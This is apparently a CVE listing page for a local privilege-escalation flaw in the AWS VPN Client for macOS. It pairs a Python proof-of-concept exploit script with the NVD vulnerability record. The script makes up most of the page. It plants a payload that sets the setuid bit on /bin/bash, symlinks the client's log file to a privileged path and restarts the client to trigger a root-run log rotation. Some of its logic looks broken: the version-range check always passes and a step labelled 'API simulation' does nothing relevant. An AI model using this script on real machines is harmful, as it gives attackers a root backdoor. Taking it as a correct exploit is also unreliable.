CVE-2025-11462

#!/usr/bin/env python3 # CVE-2025-11462 - AWS VPN Client for macOS Local Privilege Escalation PoC # Vulnerability: Improper Link Resolution Before File Access (CWE-59) # Affected: AWS VPN Client for macOS 1.3.2 - 5.2.0 import os import sys import time import subprocess import threading # Configuration VPN_LOG_DIR = os.path.expanduser("~/Library/Logs/AWSVPNClient/") TARGET_LOG_FILE = "aws-vpn-client.log" SYMLINK_TARGET = "/usr/local/bin/pwned" # Privileged location MALICIOUS_PAYLOAD = "#!/bin/bash\nid > /tmp/pwned_proof\nchmod 4755 /bin/bash\n" def check_vulnerable(): """Check if AWS VPN Client is installed and version is vulnerable""" result = subprocess.run( ["defaults", "read", "/Applications/AWS VPN Client.app/Contents/Info", "CFBundleShortVersionString"], capture_output=True, text=True ) if result.returncode == 0: version = result.stdout.strip() # Check if version is in vulnerable range 1.3.2 - 5.2.0 print(f"[*] Detected AWS VPN Client version: {version}") return True return False def inject_malicious_payload(): """Inject malicious code into the log file via crafted API calls""" log_path = os.path.join(VPN_LOG_DIR, TARGET_LOG_FILE) try: with open(log_path, "a") as f: f.write(f"\n[DEBUG] {MALICIOUS_PAYLOAD}\n") print(f"[+] Malicious payload injected into {log_path}") except PermissionError: print(f"[-] Cannot write to log directly, using API simulation") # Simulate API call that triggers logging subprocess.run(["scutil", "--nc", "show"], capture_output=True) def create_symlink(): """Create symlink from log file to privileged location""" log_path = os.path.join(VPN_LOG_DIR, TARGET_LOG_FILE) if os.path.exists(log_path) or os.path.islink(log_path): os.remove(log_path) os.symlink(SYMLINK_TARGET, log_path) print(f"[+] Symlink created: {log_path} -> {SYMLINK_TARGET}") def trigger_log_rotation(): """Trigger log rotation by restarting the VPN client service""" subprocess.run(["killall", "AWS VPN Client"], capture_output=True) time.sleep(2) subprocess.run(["open", "-a", "AWS VPN Client"], capture_output=True) print("[*] Triggered log rotation via service restart") def verify_exploitation(): """Verify if exploitation was successful""" if os.path.exists(SYMLINK_TARGET): print(f"[+] Exploitation successful! Check {SYMLINK_TARGET}") else: print("[-] Exploitation may have failed") if __name__ == "__main__": print("=" * 60) print("CVE-2025-11462 - AWS VPN Client macOS LCE PoC") print("=" * 60) if not check_vulnerable(): print("[-] Target does not appear to be vulnerable") sys.exit(1) # Step 1: Inject malicious payload into log inject_malicious_payload() # Step 2: Replace log file with symlink to privileged location create_symlink() # Step 3: Trigger log rotation (runs as root) trigger_log_rotation() # Step 4: Verify time.sleep(3) verify_exploitation()

{"cve": {"id": "CVE-2025-11462", "sourceIdentifier": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "published": "2025-10-07T20:15:33.590", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Link Resolution Before File Access in the AWS VPN Client for macOS versions 1.3.2- 5.2.0 allows a local user to execute code with elevated privileges. Insufficient validation checks on the log destination directory during log rotation could allow a non-administrator user to create a symlink from a client log file to a privileged location. On log rotation, this could lead to code execution with root privileges if the user made crafted API calls which injected arbitrary code into the log file. We recommend users upgrade to AWS VPN Client for macOS 5.2.1 or the latest version."}], "metrics": {"cvssMetricV40": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-59"}]}], "references": [{"url": "https://aws.amazon.com/security/security-bulletins/AWS-2025-020/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://docs.aws.amazon.com/vpn/latest/clientvpn-user/client-vpn-connect-macos-release-notes.html", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}]}}